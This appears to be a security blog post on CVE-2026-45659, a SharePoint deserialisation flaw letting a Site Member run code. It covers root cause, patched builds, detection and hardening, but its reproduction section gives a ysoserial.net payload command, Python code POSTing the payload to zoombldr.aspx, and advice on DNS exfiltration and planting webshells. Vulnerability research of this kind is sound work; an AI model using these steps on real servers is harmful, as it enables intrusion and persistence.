SharePoint deserialisation RCE: CVE-2026-45659

A plain Site Member account is enough to run code on a SharePoint server. Microsoft rated exploitation unlikely, and CISA put it in the KEV catalogue with three days to remediate.

Overview

Field Detail
CVE CVE-2026-45659
CVSS 8.8 (High)
CWE CWE-502 deserialisation of untrusted data
Affected SharePoint Server 2016, 2019, Subscription Edition
Fixed by May 2026 security updates
Disclosed 2026-05-21
Exploited in the wild Yes, CISA KEV and ransomware association

SharePoint Server is one of the most widely deployed collaboration platforms on enterprise networks. The flaw lets an authenticated attacker holding only the lowest Site Member privilege (PR:L) run arbitrary code on the target server, with no administrator or elevated rights.

CISA added it to the Known Exploited Vulnerabilities catalogue on 1 July 2026 and gave federal agencies until 4 July to remediate, just three days. That tempo says two things at once: it is actively exploited, and it is tied to ransomware.

How it was found

The researchers audited handling logic in specific _layouts endpoints. _layouts/15/zoombldr.aspx and _layouts/15/people.aspx accept the __SPSCEdit field in a POST body and deserialise that field, without sufficient validation of where the data came from or what type it is.

That means a malicious serialised payload can be placed straight into __SPSCEdit. When the server processes the request, deserialisation invokes the object type and constructor the attacker named, ending in arbitrary code execution.

Microsoft published the advisory and patch on 21 May 2026, rating exploitation as less likely. CISA then added it to KEV on evidence of real exploitation. The gap between those two positions is itself the finding: a vendor’s initial assessment is not the final word.

Reproduction

Everything below is for authorised security testing only.

The lab needs Windows Server 2019 or 2022, SharePoint Server 2019 below build 16.0.10417.20128, a domain account with Site Member rights, and ysoserial.net.

Step one: build a .NET deserialisation payload. Use the TypeConfuseDelegate chain with BinaryFormatter and base64 output:

.\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter `
  -c "cmd /c whoami" -o base64

Step two: send the exploit request. Place the payload in __SPSCEdit with the list and source fields and POST to the endpoint, authenticating as the Site Member:

data = {
    "__SPSCEdit": payload_b64,
    "__List": "Documents",
    "__Source": f"{target}/Documents/Forms/AllItems.aspx",
}
session.post(f"{target}/_layouts/15/zoombldr.aspx", data=data, auth=(user, pwd))

A 200 means the request was accepted, 401 is a credential problem, and 403 means insufficient privilege. This flaw needs the lowest rung, Site Member.

Step three: verify and continue. With command output, read the response directly; without it, DNS exfiltration such as a hostname-bearing subdomain lookup confirms execution. Once code runs, the typical next move is writing a webshell into a web-accessible directory for persistence, with _layouts, _vti_bin and LAYOUTS/TEMPLATE as common landing spots.

Fix

Install the May 2026 SharePoint security updates. Fixed internal builds:

Product Fixed build
Subscription Edition 16.0.19725.20280
Server 2019 16.0.10417.20128
Enterprise Server 2016 16.0.5552.1002

Detection focuses on SharePoint audit and IIS logs: anomalous POSTs to _layouts/15/zoombldr.aspx and _layouts/15/people.aspx, unusual use of the __SPSCEdit field, unexpected files under web-accessible directories such as .aspx webshells, and unusual child process creation.

Defence in depth follows least privilege: restrict Site Member assignments, narrow network access to the management endpoints and _layouts directory, enable detailed audit logging, and deploy EDR to watch for suspicious code execution.

Verdict

The severity here comes from the low privilege required. An ordinary Site Member account, the level most SharePoint environments hand to ordinary staff by default, is enough to execute arbitrary code on the server. One successful phish yielding an ordinary domain credential becomes a beachhead.

The gap between Microsoft’s less-likely rating and CISA adding it to KEV with a three-day deadline is the most portable lesson in this case: exploitation status in the wild needs continuous tracking, not a conclusion drawn on announcement day.

← Back to all posts

Comments

…